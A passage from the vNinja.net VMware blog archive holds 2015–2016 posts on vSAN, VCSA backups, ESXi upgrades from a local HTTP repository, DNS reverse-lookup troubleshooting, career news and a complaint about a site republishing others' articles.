to the project, check out this Amazon Wishlist! So far 7 RPi’s have been donated by the vExpert community, which in itself is pure awesome-sauce, but I’m sure we can one up that and make sure each of the students have two RPi’s each. --- # Top vBlog 2016 URL: https://vNinja.net/network/top-vblog-2016/ Date: 2016-05-03 Author: christian Tags: vBlog, Voting The top vBlog 2016 voting has opened, go forth and vote for your favourites now - There are a lot of them to choose from! --- # IT Architect: Foundation in the Art of Infrastructure Design: A Practical Guide for IT Architects URL: https://vNinja.net/news/it-architect-foundation-in-the-art-of-infrastructure-design-a-practical-guide-for-it-architects/ Date: 2016-04-15 Author: christian Tags: Way back in late 2014 I volunteered to do technical review for a book called **IT Architect: Foundation in the Art of Infrastructure Design: A Practical Guide for IT Architects. **Due to a lot of unforeseen events, the book has been delayed quite a bit, but it’s finally available as hardcopy, paperback and eBook! The book is written by J****ohn Yani Arrasjid, VCDX-001, Mark Gabryjelski, VCDX-023, Chris McCain, VCDX-079 and as the title states it really does lay out the foundation of how to approach infrastructure design in a modern virtualised data center. I’m truly honored to have had a small part in the creation of what I consider to be a must read for all existing and aspiring IT-architects! It highlights methodology, but it also contains design processes through case studies with concrete examples. Grab a copy today, it’s well worth both the money and the time spent reading it. I can guarantee that you won’t only read this book once, you’ll be going back through it several times as it is a treasure trove of real world experience that is hard to come by any other place. This is the first of a series of design books, so there are more goodies on the way! --- # My Contribution to the vSphere Design Pocketbook v3 URL: https://vNinja.net/news/my-contribution-to-the-vsphere-design-pocketbook-v3/ Date: 2016-04-08 Author: christian Tags: PernixData, and Frank Denneman, has released vSphere Design Pocketbook v3. As the title reads, this is the third time PernixData releases one of these books, and I’m honored to be selected amongst the contributors for the second time, this time with a chapter called “VCSA vs Windows vCenter - Which One Do I Choose, and Why?” Go grab your electronic copy now, and be sure to bug your local PernixData representative for a hard-copy later. I know I will. --- # I'm honored. And a Bit Scared. URL: https://vNinja.net/network/im-honored-and-a-bit-scared/ Date: 2016-04-05 Author: christian Tags: Yesterday was my first real day as a Senior Solutions Architect for Proact, and today I flew to Oslo for on-boarding and some face-to-face time with my new colleagues over there. By the looks of it, there is a lot of exciting things in the pipeline, and it we land the things we have started on this should be interesting. Very interesting indeed. In addition to the excitement around changing employers, and roles, some other things have also happened. Firstly, Veeam decided to award me the Veeam Vanguard title for 2016. I had the honour of being one of the inaugural members of this group in 2015, and I’m very happy to be included in the group once more. Secondly, VMware has announced the list of their EUC Champions for 2016. This program had a “soft-launch” in 2015, but has now gone official in 2016. I’m extremely honoured to extend my membership in this small group in 2016. Thirdly, a few days ago Issue 1, 2016, of VMUG Compass was published – and that includes an interview with me as well. It’s been quite a week so far, and it’s only Tuesday. Now, I need to go lay down for a bit… --- # I Made Something Happen URL: https://vNinja.net/news/i-made-something-happen/ Date: 2016-03-31 Author: christian Tags: Change, EVRY, Proact, Role I think Seth Godin might have been onto something with “Make something happen”, so I did. Today was my last day at EVRY. Some might already have been aware of this, mostly because of Hoff-Job-Announcement-as-a-Service, but also because of my own tweet as I left the EVRY offices in Bergen as an employee for the last time: So long and thanks for all the fish. pic.twitter.com/ur0wKjORDW — Christian Mohn™ (@h0bbel) March 31, 2016 The decision to leave EVRY was not an easy one, but it was time to try something else. I have nothing but respect for both company and my now former colleagues and I’m certain EVRY will continue it’s mission to become the Nordic IT champion, and I’m also certain they will succeed. My new role is as a Senior Systems Architect for Proact IT Norge, with a focus on VMware’s SDDC stack. What that really means, remains to be defined, but I’m excited to start this new endeavour and be given an opportunity to help Proact design the data centres of the future. Proact recently also won a Global VMware Innovation Award for 2016, so I guess I’m at the right place at the right time when I now join #teamproact. So, in the words of Jake and Elwood: Elwood: It's 106 miles to Chicago, we got a full tank of gas, half a pack of cigarettes, it's dark... and we're wearing sunglasses. Jake: Hit it. --- # Running a vSAN PoC - Customer reactions URL: https://vNinja.net/virtualization/running-a-vsan-poc-customer-reactions/ Date: 2016-02-24 Author: christian Tags: Proof-of-Concept, storage, vSAN I recently set up a VMware Virtual SAN 6.1 Proof-of-Concept for a customer, configuring a 3-node cluster based on the following setup: Hardware # HP ProLiant DL380 G9 2 x Intel Xeon E5-2680 @ 2.50Ghz w/12 Cores 392 GB RAM 1 x Intel DC 3700 800GB NVMe 6 x Intel DC S3610 1.4TB SSD HP FlexFabric 556FLR-SFP+ 10GBe NICs Virtual SAN Setup # Since this was a simple PoC setup, the VSAN was configured with 1 disk group pr host with all 6 Intel DC S3610 drives used as the capacity layer, and the Intel DC P3700 NVMe cards set up as the cache. This gives a total of 21.61TB of usable space for VSAN across the cluster. With the Failures-To-Tolerate=1 (the only real FTT policy available in a three node 6.1 cluster) policy this gives 10.8TB of usable space. vMotion and VSAN traffic were set up to run on a separate VLANs over 2 x 10GBe interfaces, connected to a Cisco backend. Customer reaction # After the customer had been running it in test for a couple of weeks, I got a single line email from them simply stating: “WOW!”. They were so impressed with the performance (Those NVMe cards are FAST!) and manageability of the setup that they have now decided to order an additional 3 hosts, bringing the cluster up to a more reasonable 6 hosts, in a metro-cluster setup, and upgrade to VSAN 6.2 as soon as it’s available. The compression, deduplication and erasure coding features of 6.2 will increase their available capacity just by upgrading. At the same time, adding three new hosts will effectively double the available physical disk space as well, even before the 6.2 improvements kick in. VSAN will be this customers preferred storage platform going forward and they can finally move off they existing monolithic, and expensive, FC SAN over to a storage solution that outperforms it and greatly reduces complexity. --- # vCenter Server Appliance Backups URL: https://vNinja.net/vmware-2/vcenter-server-appliance-backups/ Date: 2016-02-18 Author: christian Tags: Backup, vCenter, VCSA, VMware For some time now I’ve been advocating the usage of VCSA instead of the traditional Microsoft Windows based vCenter. It has feature parity with the Windows version now, it’s easier to deploy, gets right-sized out of the box and eliminates the need for an external Microsoft SQL server. One of the questions I often face when talking about the appliance,_ is how do we handle backups?_ Most customers are comfortable with backup up Windows servers and Microsoft SQL, but quite a few have reservations when it comes to the integrated vPostgres database that the VCSA employs. One common misconception is that a VCSA backup is only crash-consistent. Thankfully vPostgres takes care of this on it’s own, by using what it calls Continuous Archiving and Point-in-Time Recovery (PITR). In essence, vPostgres writes everything to a log file, in case of a system crash. Since this is done continuously, every transaction that should hit the DB is recorded and can be replayed if required. From the Postgres documentation: “We do not need a perfectly consistent file system backup as the starting point. Any internal inconsistency in the backup will be corrected by log replay (this is not significantly different from what happens during crash recovery). So we do not need a file system snapshot capability, just tar or a similar archiving tool.” With regards to the VCSA, this means that your image level backups will be consistent, and there isn’t really a need to dump and export the vPostgres DB and then archive that. Yet another reason to switch to the appliance today! Myth busted! --- # Oh wow, it's already 2016. URL: https://vNinja.net/misc/oh-wow-its-already-2016/ Date: 2016-02-03 Author: christian Tags: 2016, Plans A bit late, considering it’s already February, but here it is: My plan for 2016. # Shake things up a bit - Go big or go home. 2016 will be a year of changes. It’s about time I shake things up a bit, and 2016 will be that year. More details on this to come later, for now I have to keep it under wraps. Get VCIX certified - I’ve signed up for the new 3V0-622: VMware Certified Advanced Professional 6 - Data Center Virtualization Design Beta Exam. This will be my first ever VMware beta exam. If I fail that one, I will try again later in 2016 to obtain the VCIX certification. Keep vSoup on track - We’ve committed, at least to ourselves, that in 2016 we will record vSoup monthly. VMUG - The Norwegian VMUG is up and running, but I would like to get even better attendance records and more community contributions.The sponsors pays the bills, the community contributions brings the most value. In the spirit of the Feed4ward program I’ll be happy to mentor/help anyone who wants to present at a VMUG meeting in Norway. I intend to arrange at least 3 VMUG meetings in Bergen in 2016. Attend an international industry conference - In 2015 I missed out on VMworld entirely, due to issues out of my control. My goal is to make sure I attend a least one industry conference this year, most likely VMworld 2016 in Barcelona. Code something - My ambition is that some time in 2016 I will code something. It’s very clear to me that even though I’m in no developer by nature, a basic developer skill set is required by everyone these days. Me included. I’ll consider this my wildcard project for 2016, as I haven’t decided on what to do yet, or even how. In general, I will continue writing and posting whenever I feel like it. I will also focus even more on public cloud offerings, and especially how to integrate then with existing on-premises solutions. Since these are more general goals that are hard to put into a measurable format, I’ll refrain from putting them down in the list as individual entries. Of course, the best laid plans of mice and men often go awry; 2016 might just move me into other directions too. --- # 2015: The verdict URL: https://vNinja.net/misc/2015-the-verdict/ Date: 2016-01-30 Author: christian Tags: 2015, Personal, Prediction Last year, in January, I posted 2015: Let’s DOS IT! and it’s time to do some reviewing (again, inspired by Scott Lowe). So, how did I do? # Master Markdown: I’m happy to say that most of the writing I’ve done in 2015 has been done in Markdown. I haven’t really moved on to really create Markdown based documentation and convert it like I intended, but still, Markdown has become second nature in 2015. Score: 7/10 Get more organised: Now this one is easy. As mentioned in Todoist: One Year Later I’ve completed 722 Todoist tasks in 2015, giving me a Todoist Master Karma level. Score: 10/10 **Write better blog posts: **This one is hard to gauge, and to be honest it’s a really bad goal without any real metrics attached to it. I certainly didn’t increase my blogging frequency in 2015, but I did manage to put a few non-technical posts up on Medium. Score: 5/10 Get that VCAP-DCD certification: Funnily I did get my VCAP5-DCD certification. I didn’t get it in 2015 though, turns out I actually got it in 2014 after all. For some reason VMware Education informed me of this now in January 2016. Why this happened, I have yet to find out, other than that there has to have been something wrong with the exam I took in 2014. Pretty bizarre, but at least I can cross that off the list as completed. Can’t give it a perfect 10 though, after all I didn’t pass it in 2015. Score: 7/10 **Redesign vNinja: **A bit of a cheat this one, the redesign was mostly in the bag when the 2015 goals were written. I’m still not really happy with it, but it works. Score: 5/10 Overall Score 34/50 I can absolutely live with that result, even though I wish the scores were a bit higher. Now I just need to write down a list for 2016 and publish that as well. To be sure I don’t forget, I’ve already put it into my Todoist task list, alongside the review task for 2016. --- # Running Dockerflix on Ravello Systems URL: https://vNinja.net/virtualization/running-dockerflix-on-ravello-systems/ Date: 2016-01-14 Author: christian Tags: Docker, Dockerflix, Hipster IT, Ravello, VMware Photon Dockerflix is a nice little project that allows you to route your Netflix (and other various streaming services) through a SNI Proxy to access content otherwise geo-blocked. Of course, this requires that you have a VM with for instance an US IP to provide the breakout network, and that’s where Ravello Systems comes into the equation. Luckily as a current vExpert I have access to 1000 free monthly CPU hours of personal/lab usage, all with a choice of regions to put the VM in. Perfect. I created a VMware Photon based VM on Ravello, with an Elastic IP that allows the IP to stick to the VM, even if it’s moved to another public cloud, and installed Dockerflix. VMware Photon doesn’t come with docker-compose, which Dockerflix is dependant on, check Install Docker Compose for details on how to install it. Once that is installed, run the following command to download and install Dockerflix. git clone https://github.com/trick77/dockerflix.git Setup of Dockerflix itself is pretty straight forward, just follow the README provided by the project. Make sure you enable http/https/ssh to the VM with a public IP. Once that was done, I set up dnsmasq on one of the Linux VMs in my home-lab, with the output config the python script provided by Dockerflix. python ./gendns-conf.py --remoteip [RAVELLO_PUBLIC_IP] Note: Running this permanently would be a violation of the Ravello vExpert Terms of Service. This is to be considered a technical Proof of Concept, more than a permanent setup. I haven’t investigated the possibility to set up something like this permanently on either vCloud Air, AWS, Azure or Google Cloud Platform, or if you are even allowed to do so. But then again, all you are doing is routing IP traffic… As far as testing goes, I experienced no problems with bandwidth or anything else. Streaming was perfect, and seamless. The fact that I was routing the traffic through a VM running in the US was not noticeable at all. Configuring it was a great exercise. Not only did I get to play with VMware Photon and Docker, but it also shows that using Ravello Systems to perform Proof of Concept scenarios is perfectly viable, even enjoyable. --- # Todoist: One year later URL: https://vNinja.net/workflow/todoist-one-year-later/ Date: 2016-01-06 Author: christian Tags: Evernote, Productivity, Todoist A little over a year ago I posted Combining Todoist and Evernote, because awesome and I thought it was about time to post a follow up now one year later. Evernote # Firstly, my Evernote is still a giant mess, just as it was a year ago. I have lots of data in Evernote, but it’s main purpose is just storing quick notes on ongoing projects and it serves as a basis for generating proper documentation. For that purpose it works really well, but I can’t seem to be able to actually use it for much beyond that. For me, Evernote is the equivalent of a shed: A place you put all your stuff, only to realize you never use it again. Since my original post, I’ve stopped my Todoist Task -> Evernote IFTT recipe. After all, it did was to store even more unneeded stuff in my shed. Todoist # 2015 was the first full year I’ve used Todoist as my primary task manager. 722 completed tasks later, and I couldn’t be happier with it. It’s easy to work with, very flexible, and doesn’t get in the way. I have the iOS app running on my phone, the desktop application running on OS X and the Outlook plugin running in my corporate VM. It helps me focus on the things I need to get done, and if I need to take notes or document things in relation to those tasks, I create Evernote notes for them manually. I’ve tried several ToDo task managers in the past, but Todoist is the first one that’s stuck with me. Plus, completing a task given me Karma points. I like karma, especially when it goes in my favor. Now, of course, I have to do some automation. Everything I tag with “reading” in Pocket, gets added to my “To Read” project in Todoist. That provides me with a nice list of things I’ve been meaning to read later, all within the same interface as my daily tasks. Has it made me more productive? I don’t know. What I do know is this: It certainly makes it much harder to forget to do something, and that can’t be bad. --- # YourDailyTech - Content Stealers URL: https://vNinja.net/news/yourdailytech-content-stealers/ Date: 2015-12-03 Author: christian Tags: Yesterday I saw this tweet from Stephen Foskett: Dear @YourDailyTechUS, You appear to rip off whole articles from a wide variety of sources. Is your business model based on plagiarism? — Stephen Foskett (@SFoskett) December 2, 2015 Which spurred a discussion back and forth, with a few rather interesting statements from yourdailytech.com, like this one @h0bbel @SFoskett Our goal is to provide our readers with relevant information and content writers with a wider audience. — YourDailyTech (@YourDailyTechUS) December 2, 2015 The problem is that they take original content from other sites, and republish it on their own. At first glance, you’ll see Angelica as the author, even if they claim that that’s not the intention. It just happens to be that user account that published the reproduced content, like this one 5 Key Aspects for Safe Virtualization – The original author is mentioned in the article itself, in this case Camilo Gutierrez Amaya published on www.welivesecurity.com. For all I know YourDailyTech has an official partnership with welivesecurity.com, but I don’t see any information about that on the site itself. So, what’s the problem? Well, in a nutshell what yourdailytech.com is doing is copyright infringement. Pure and simple, just have a look at the very definition of copyright infringement (from Wikipedia) Copyright infringement is the use of works protected by copyright law without permission, infringing certain exclusive rights granted to the copyright holder, such as the right to reproduce, distribute, display or perform the protected work, or to make derivative works. By also adding their own ads on their “recycled” content, they are not only republishing content without permission but they are also monetizing it for their own benefit. Some of the original content owners have even paid for the content, only to have someone else republish it. Bad as this might be, the problems don’t stop there. Google punishes duplicate content, and in the worst cases it might even de-list sites that engage in it. So in YourDailyTech’s quest to connect “content writers with a wider audience.” they risk punishing the original content creators in the process. After yesterdays discuss on Twitter, yourdailytech.com has published “an apology” called An Open Letter to Our Readers and yet again, there are several problems: “We are deeply sorry for any ill feelings we caused by posting articles from authors without their knowledge. “ – So, they openly admit to copyright infringement, but only because they thought content creators would benefit from it. Why would anyone believe that? “To be perfectly clear, we in no way monetized and/or profited from the hard work they put in to creating great content.” – So, the ads the pages of your stolen content are there by accident? “We have NEVER misled anyone into believing a YourDailyTech employee was the original author and never will.” – Well, if you have a look at http://yourdailytech.com/author/angelica/ it even mentions Angelica as the author right in the URL itself. I would call that misleading. The open letter is even signed by Philip Reid, but the author of the article is … Angelica. The apology seems to written as a response to being caught, nothing else. I’m sorry, but there is no way to take a company (?) that behaves like this seriously. What YourDailyTech is doing is pure theft, and I urge anyone who find their own content republished on that site to file a Cease and Desist order, a DMCA request and publicly shame YourDailyTech. Note: As far as I know, none of my own content has been ripped this way. I just feel sorry for the people that YourDailyTech abuses in this manner. Update # If you want to check if your own content has been ripped, do a Google search for site:yourdailytech.com . Hat tip to Justin Warren for that suggestion. --- # VMware VSAN - More than meets the eye. URL: https://vNinja.net/virtualization/vmware-vsan-more-than-meets-the-eye/ Date: 2015-11-13 Author: christian Tags: Future, Microvisor, VSAN, vSphere Way back in 2014 I wrote a piece called VSAN – The Unspoken Future, and I think it’s about time it got a revision. Of course, lots of things have happened to VSAN since then and even more is on the way, but I think there is more to this than adding features like erasure coding, deduplication and compression. All of these are important features, and frankly they need to be in a product that aims a lot higher than you might think. At the moment, VSAN does storage internally in a vSphere Cluster. If you want to use that storage in other ways, you either have to share it from a VM over the network or use NexentaConnect for VMware Virtual SAN. Yesterday, VMUG.itshared the following photo from Duncan Eppings “Goodbye SAN Huggers, Hello Virtual SAN” session from their VMUG UserCon: Look closely at that one for a minute. What is Duncan and VMware telling us here, if you squint your eyes and try to read between the lines? For me, this slide was a bit of a lightbulb moment: VMware wants to turn VSAN into a generic storage provider in the data center. You need some storage of some sort? VSAN will provide it, even if your applications are not located on the same cluster. Object based? Sure. Block? Sure. REST? Sure, that’s what the cool kids do. VMFS? Only if you need to run a VM. Couple this with the vSphere Integrated Containers and Photon Platform announcements, VMware is already talking about the microvisor. So, remove the vSphere layer in the slide above, and replace it with a variant of the VSAN ROBO witness appliance of some sort, which runs enough to provide policy based storage services. Once you have those two bits talking to each other, you don’t need the traditional vSphere layer to provide hardware virtualization at all for those cloud native apps. Add NSX to the mix, and network policies that follow the application, and you have a portable application infrastructure that can run pretty much anywhere you prefer. At VMworld 2015, VMware showed NSX for Multi-Hypervisor running on AWS, extending the network from on-premises to Amazon. Why not do the same with storage? Want cloud based storage? Sure, add the little VSAN layer in front of your providers storage offering, and boom, instant policy management and portability. And of course, VMware will be there to provide you with the management and monitoring layer for all of this - Even if you don’t run vSphere. VMware is getting ready for the post-virtualization, multi-platform, world, no question about it. Are You Ready for Any? --- # vCenter / SSO unable to retrieve AD-information | Error while extracting local SSO users URL: https://vNinja.net/virtualization/vcenter-sso-unable-to-retrieve-ad-information-error-while-extracting-local-sso-users/ Date: 2015-11-10 Author: Tags: 6.0, ESXi, SSO, vCenter, vSphere After deploying a new VCSA 6.0u1 I was seeing some weird errors while trying to retrieve AD- users/groups (or anything from the esod.local domain): After some serious head scratching, it dawned on me after checking the DNS records for the DC in the domain, from the vCenter Appliance itself: dig +noall +answer +search dc1.esod.local dc1.esod.local. 3600 IN A 10.0.1.201 So far so good, the DNS lookup works as expected. dig +noall +answer +search -x 10.0.1.201 That’s right, the reverse lookup returns exactly zilch, zero, zippo, nil, nada and null. The Solution # Add reverse lookup zone to DNS and update the DC PTR record. Once that it done, it works as expected: dig +noall +answer +search -x 10.0.1.201 201.1.0.10.in-addr.arpa. 3600 IN PTR dc1.esod.local. Re-checking the domain in the vCenter Web Client, and AD-information is retrieved correctly. It turns out that in VC6.0u1 reverse PTR records are required for SSO and Active Directory authentication to function properly. --- # Nordic VMUG UserCon Session URL: https://vNinja.net/virtualization/nordic-vmug-usercon-session/ Date: 2015-10-28 Author: christian Tags: Speaking, UserCon, VMUG VMUG Denmark is arranging the Nordic VMUG UserCon in Copenhagen December 1st 2015, and the agenda went live earlier today. I’m definitely going to be there, and as it turns out I even have my own session lined up: Session Title VCS to VCVA Converter or how a fling can be good for you! Session Abstract: Migrating from Windows vCenter to the VCVA? No worries, the VMware VCS to VCVA Converter fling has you covered! Learn how to migrate your existing configuration to the vCenter Virtual Appliance. We’ll cover both best practices and caveats from real world experiences with the tool! I hope to see all of you there, and perhaps some of you will even pop into my session. I’m certain that “Getting back to my roots – a look at vSphere Core Storage Enhancements! - Cormac Hogan, VMware” and “vRealize Orchestrator – The missing “Getting Started” session - Joerg Loew, VMware” will draw the biggest crowds in my time slot though (Which is arguably a good thing). VMUG Denmark has really put together a great looking agenda, with additional speakers like Paul Strong, Duncan Epping, Paudie O’Riordan and William Lam to mention a few. I’m also really looking forward to the closing keynote “The Cloud and Beyond” by Andreas Mogensen of the ESA. So, if you have the chance, book a trip to Copenhagen and lets meet up for a beer at the closing reception at the Nordic VMUG UserCon, see you there! --- # Relax and virtualize it! URL: https://vNinja.net/virtualization/relax-and-virtualize-it/ Date: 2015-10-15 Author: Tags: This is a guest post from Kristian Wæraas Senior Consultant Datacenter at Datametrix AS VMware VCP3/5, MCTS Hyper-V, Horizon View and Trend Micro Security Expert. I am a curious by nature, and when my colleagues start talking frantic about some system that has crashed, I get curious and have to ask questions. Usually this ends up in me doing a lot of work. - This, however, was not one of those times. A few weeks ago, one of my colleagues came in late after a long night trying to fix a reoccurring bluescreen on a critical customer database server. Quite drawn in his face he sat down, picked up his phone and called Microsoft Support. I have to admit that I did some eavesdropping on that conversation, as it contained a few interesting tidbits that aroused my curiosity. -“Physical server” (We still use those?) -“Database on FC SAN”. -“Critical data!” (Oh my!) The minutes went by and turned into hours, and they still tried to fix the server. Diagnostics, rescue disks, rescue console, driver reinstalls, system file checking, fixing mbr and so on – but the server refused to cooperate. At some point Microsoft gave up on fixing the server, and asked if we could just reinstall it, which in this case would take even more hours. When lunchtime came they had taken a break, and I started asking my colleague questions; not regarding the bluescreen and possible fixes, but more on the basic layout of the system. It turns out that it was an old physical server running Windows Server 2008 R2, it had Oracle database installed with the database-files placed on SAN mounted directly in to the server via FC - A normal setup for database servers I guess. We had a little chat on possible solutions to the problem during lunch, and my colleagues first thought was actually to find an identical physical server so he could install it parallel to the faulty server, then physically moving the fiber cable from the unstable server to the new. I of course asked if we could virtualize the server instead. My colleague thought the idea was intriguing, but not knowing all the details in VMware’s possibilities had many questions. -“How will it perform, how do we get the database files copied into the server, how long will it take to get a server ready, we need at least 2 CPUs and 8GBs of RAM, will there be cake?” I explained to him that performance wise, the virtual server would do just fine, and that we could give it as much resources as it needed. As for getting a server up and running, I suggested using already prepared templates, which would take no more than a few seconds to deploy. Also, and this was my key point in this solution, the file copy is unnecessary: -“You don’t have to copy the files from SAN into the server; you can just do zoning on the FC switches, and directly attach the datastore as raw disks on the virtual server. The disks will then appear inside the OS as you are used to”. -“Is all this possible? How do we do it? If it is as easy as you say this would save us hours of work!” Having done similar setups before, I was quite confident. However “saving” a physical server with real critical data from humiliation by moving datastore into a virtual server was new to me, so I did a quick tweet to my good friend Christian Mohn (vNinja extraordinare) to run my theory by him. We both agreed that the theory was spot on, but none of us had done this job before. Being afraid of data loss, data corruption and the procedure in its whole, I agreed to do some tests to see if my theory was viable in our situation. We started with a basic SAN backup of the datastore, and then we did the necessary zoning by adding the backup LUN to the VMware host zone-group. After a quick rescan of datastores on the hosts, we saw the new LUNs available for the hosts. The next thing was to add a new disk on a test-server, choose Raw Device Mappings (physical compability mode). Found the correct LUNid When all this was done, we logged into the test-server, went into Disk management and did a “Rescan Disk”. The disk appeared, drive-letter and all: After verifying that the data was there, and that everything looked good, we felt confident that this approach worked, and we did the entire process again with the “live” data. I always get a satisfied feeling inside when I am able to help a colleague solve an annoying issue. In this case, my actual work took no time at all; I also managed to open the eyes of my colleague who is now planning more p2v migrations. The customer was also happy, which in the end is what really matters. I think the moral of the story is that “knowledge is power”. If you know what different solutions/products are capable of and you know how to use them correctly, you will be able to solve most problems quite quickly. And yes, there was cake! --- # What if it's Just Some Crazy Guy in a Clown Suit? URL: https://vNinja.net/news/what-if-its-just-some-crazy-guy-in-a-clown-suit/ Date: 2015-09-08 Author: christian Tags: Changes, Cloud, EVRY, Work As a few of you have noticed, I recently changed my title on LinkedIn from Chief Consultant to Cloud Architect in the newly formed EVRY Cloud Consulting division, but what does that mean and perhaps more importantly, why? The closest description I have found to describe what my new role is this: Leads in the development of the technical solution or offering, in translating the business needs into technical requirements. Identifies gaps, strategic impacts, financial impacts and the risk profile in the technical solution or offering, and provides technical support. [Joe McKendrick / Forbes](http://www.forbes.com/sites/joemckendrick/2013/01/28/5-skills-that-should-be-part-of-every-cloud-job-description/) Or, as Mrs. Josh Atwell would say: This change comes with the realization that for most SMB customers, moving IT-services to cloud based solutions makes a lot of sense. No, this doesn’t mean I’m abandoning virtualization. I still have a passion for running efficient data centers, but only when it makes sense to do so - and often it does not - but when it does, I sure want to be there and help build it. IT means that I will need to broaden my horizons and see a larger picture. IT means I will have to learn something new IT means I will be challenged in a whole new way going forward. IT means change. IT is changing. IT is happening. IT means less product, more business needs. The time of IT for IT’s own sake has passed and I feel fine. --- # VMware Update Manager: Unsupported Configuration URL: https://vNinja.net/vmware-2/vmware-update-manager-unsupported-configuration/ Date: 2015-08-28 Author: christian Tags: ESXi, NFS, Upgrade, vCenter, Veeam Backup & Replication, VMware During an upgrade from vSphere 5.1 to 5.5, I ran into a rather strange issue when trying to utilize VMware Update Manager to perform the ESXi upgrade. During scanning, VUM reported the ESXi host as “Incompatible”, without offering any other explanation. I spent ages looking through VUM logs, trying to find the culprit, suspecting it was an incompatible VIB. Without finding anything that gave me any indication on what the problem might be, I moved on to looking at the ESXi image I had imported into VUM. As this was on a Dell PowerEdge R710, I was utilizing the Dell Customized Image of VMware ESXi 5.5 Update 2, which got an updated A02 version last night (27th of August) - I downloaded my image, VMware-VMvisor-Installer-5.5.0.update02-2068190.x86_64-Dell_Customized-A00.iso on the 27th, but before the VMware-VMvisor-Installer-5.5.0.update02-2068190.x86_64-Dell_Customized-A02.iso image was available. Thinking this would resolve the issue, I imported the new image into VUM, and created a new Upgrade Baseline. Sadly, I was still greeted by the non-gracious “Incompatible” warning after performing a new scan. After some more digging, I found the following entry in the Events pane, for the given host, in vCenter: Error in ESX configuration file (esx.conf). error 28.08.2015 11:51:25 Scan entity [hostname] [username] Naturally I go digging into the /etc/vmware/esx.conf file, and found the following entries: /nas/[oldserver]/readOnly = "false" /nas/[oldserver]/enabled = "true" /nas/[oldserver]/host = "[oldserver.fqdn]" /nas/[oldserver]/share = "/VeeamBackup_[oldserver]/" These references to [oldserver] pointed to an old Veeam Backup & Replication server that was decommissioned ages ago. Veeam B&R adds these to a host if vPowerNFS has been used to mount a backup share, and the entries had not been removed when removing the old Veeam B&R server. DNS resolution for the old server failed, as it has been completely removed from the infrastructure, thus causing the VUM update to fail. Manually removing these lines from /etc/vmware/esx.conf fixed the problem, and VUM was able to scan and remediate without issues. Update # After writing this, I saw Jim Jones had the same experience, for more details read his post: Unsupported Configuration when using VUM for a Major Upgrade --- # Update ESXi Embedded Host Client Fling URL: https://vNinja.net/vmware-2/update-esxi-embedded-host-client-fling/ Date: 2015-08-26 Author: christian Tags: Embedded Host Client, ESXi, vSphere The ESXi Embedded Host Client Fling got an upgrade today, and in addition to new features it now works properly on ESXi 5.5. In addition to this, it’s also available as an offline bundle so you can distribute it with Update Manager. Since I’ve spent most of my day in esxcli, here is a quick post on how to perform the upgrade from a local http repository hosting the .vib file. Install .vib file # Download the esxui-3015331.vib file and place it somewhere accessible via http. SSH to your ESXi host, and run the following command (remember to enable maintenance mode if needed). esxcli software vib install -v http://[yourip:port/path]/esxui-3015331.vib Wait for the installation to finish Installation Result Message: Operation finished successfully. Reboot Required: false VIBs Installed: VMware_bootbank_esx-ui_0.0.2-0.1.3015331 VIBs Removed: VMware_bootbank_esx-ui_0.0.2-0.1.2976804 VIBs Skipped: Access the updated Embedded Host Client via http://hostip/ui/ --- # ESXi5.5 to 6.0 Upgrade From Local HTTP Daemon URL: https://vNinja.net/vmware-2/esxi5-5-to-6-0-upgrade-from-local-http-daemon/ Date: 2015-08-26 Author: christian Tags: ESXi, vCenter, VMware, vSphere I was recently involved with consulting for a Norwegian shipping company who has quite a few remote vSphere installations, most of them with a couple of ESXi hosts, but no vCenter and hence no Update Manager. While looking at methods for managing these installations, in particular how to facilitate patching and upgrading scenarios, I remembered that way back in 2013, I posted Quick and Dirty HTTP-based Deployment which shows how to use the Python to run a simple http daemon, and serve files from it. Surely something similar can be used to maintain a central repository for vSphere patches? While I don’t recommend using your MacBook as a permanent source for these updates, you really should set up a proper http server in your network and utilize that, it works as a proof of concept. So here it is, a recipe for using a simple http daemon to host your own ESXi Offline Bundles, and how to upgrade from 5.5 to 6.0 from the command line. # Download the offline bundle you want to use, in my case I used ESXi600-201507001.zip (ESXi 6.0.0b). Extract the .zip file into it’s own directory, served by the http daemon, and rename it for simplicity. Connect to your target ESXi host via SSH Check the current running ESXi version by running _esxcli system version The time and date of this login have been sent to the system logs.VMware offers supported, powerful system administration tools. Please see www.vmware.com/go/sysadmintools for details.The ESXi Shell can be disabled by an administrative user. See the vSphere Security documentation for more information. ~ # esxcli system version get Product: VMware ESXi Version: 5.5.0 Build: Releasebuild-1623387 Update: 1 ~ # Enable outgoing http requests from the ESXi host by running esxcli network firewall ruleset set -e true -r httpClient Determine which profile to use by running __esxcli software sources profile list -d [http://daemon-ip:port/directory/] ~ # esxcli software sources profile list -d http://172.29.100.248:8000/6.0/ Name Vendor Acceptance Level -------------------------------- ------------ ---------------- ESXi-6.0.0-20150701001s-standard VMware, Inc. PartnerSupported ESXi-6.0.0-20150701001s-no-tools VMware, Inc. PartnerSupported ESXi-6.0.0-20150704001-no-tools VMware, Inc. PartnerSupported ESXi-6.0.0-20150704001-standard VMware, Inc. PartnerSupported ~ # Run vim-cmd hostsvc/maintenance_mode_enter to put ESXi host into maintenance mode. Run _esxcli software profile update -d [http://daemon-ip:port/directory/] -p [profilename] _to fetch and install from http daemon # esxcli software profile update -d http://172.29.100.248:8000/6.0/ -p ESXi-6.0.0-20150704001-standard Update Result Message: The update completed successfully, but the system needs to be rebooted for the changes to be effective. Reboot Required: true VIBs Installed: [long list of vibs removed for brevity] VIBs Skipped: ~ # Disable outgoing http client traffic by running esxcli network firewall ruleset set -e false httpClient Reboot host by running the reboot command When host has rebooted, connect to ESXi host again via SSH and run _esxcli system version get [root@localhost:~] esxcli system version get Product: VMware ESXi Version: 6.0.0 Build: Releasebuild-2809209 Update: 0 Patch: 11 [root@localhost:~] _ Verify that it runs the correct version, and run vim-cmd hostsvc/maintenance_mode_exit to put the host out of maintenance mode. And that’s it, the host has now been upgraded from ESXi 5.5 to 6.0, from a local centralized http-based repository without the need to connect to the outside world. All done via the command line, and without a vCenter with Update Manager. Pretty neat. --- # HP Proliant DL380p Gen8 "Decompressed MD5" error URL: https://vNinja.net/virtualization/hp-proliant-dl380p-gen8-decompressed-md5-error/ Date: 2015-08-13 Author: Tags: This is a guest post from Shane Williford Sr. Systems Engineer, VCAP-DCA/EMCCAe/Pizza Connoisseur and vExpert. Problem History # I work at a school district in the US (Kansas City area). After the school year ended, my Director decided he wanted to upgrade to vSphere6 from vSphere55U2 on a few Hosts we were using with XenApp. We are using XenApp to deliver apps to student labs that utilize an Autocad program. As such, our Hosts also have a graphics card in them – nVIDIA GRID K1. To give the students a bit more graphics power this upcoming school year, we added a 2nd nVIDIA card to each Host. The Hosts are HP Proliant DL380p Gen8 with 